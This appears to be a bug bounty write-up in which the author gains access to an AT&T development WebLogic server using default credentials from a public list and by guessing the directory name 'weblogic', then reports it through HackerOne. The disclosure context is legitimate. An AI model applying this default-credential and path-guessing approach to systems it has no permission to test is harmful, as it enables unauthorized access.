A simple post auth bypass leads to unauthorized web server access

Hi all, I hope u are doing well. I’m Hein Thant Zin and juat a noob bug bounty hunter from Myanmar.This is my third write up about one of my recent findings on h1.

The story began after local CTF had finished.It was about Sept 1, I did want to go back bug bounty for 1 month . So I decided to hunt bug on AT&T with my fri.

After some days and some duplicate reports passed. The night has come.

It was look like custom developing subdomain there is nothing interesting , just a simple login page for internal user .I’ve tested for auth bypass bug but failed.

After some recons, He said “bro three is a pop-up login page saying “weblogic””.

Image for post
Image for post
http://exapledevlopment.att.com/management/

I did’t even know what the hell is weblogic before.So I found out google and tried to login using default login credentical but failed. Then I got this link https://github.com/lanjelot/kb/blob/master/weblogic

After many attempts failed , I was able log in using one of these credenticals. Unfortunately , the response was look like

Image for post
Image for post

Well , I couldn’t fingure out how the hell is that. I stucked for a while and did’t know how to do then it was about 2 am so I was going bed to sleep.

The next day , I wake up at 1 pm and picked up my laptop and tesing again. Tried to bruteforce directory , changing http request methods but all failed.

Image for post
Image for post

I had almost to give up but suddendely I remembered that why I should not give a try “weblogic” as a directory name.It does make sense right?

I put the name as directory and Boom!!! I was completely accessed in their weblogic server. I was able to view all server informations and their internal development app and other sensitive informations.

Image for post
Image for post

Then I reported to HackerOne. They triaged and rewarded after the report resolved . I hope you enjoyed by reading this . Follow me for more write up there.

http://twitter.com/H3Lowr

Timeline -:

Sept , 14, 2019 -Reported

Sept, 15, 2019 -Triaged by h1 team

Oct , 22 , 2019 -Fixed and Bounty awarded $750.

See ya guys. I’ll be back with the next finding soon…… Thank u.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store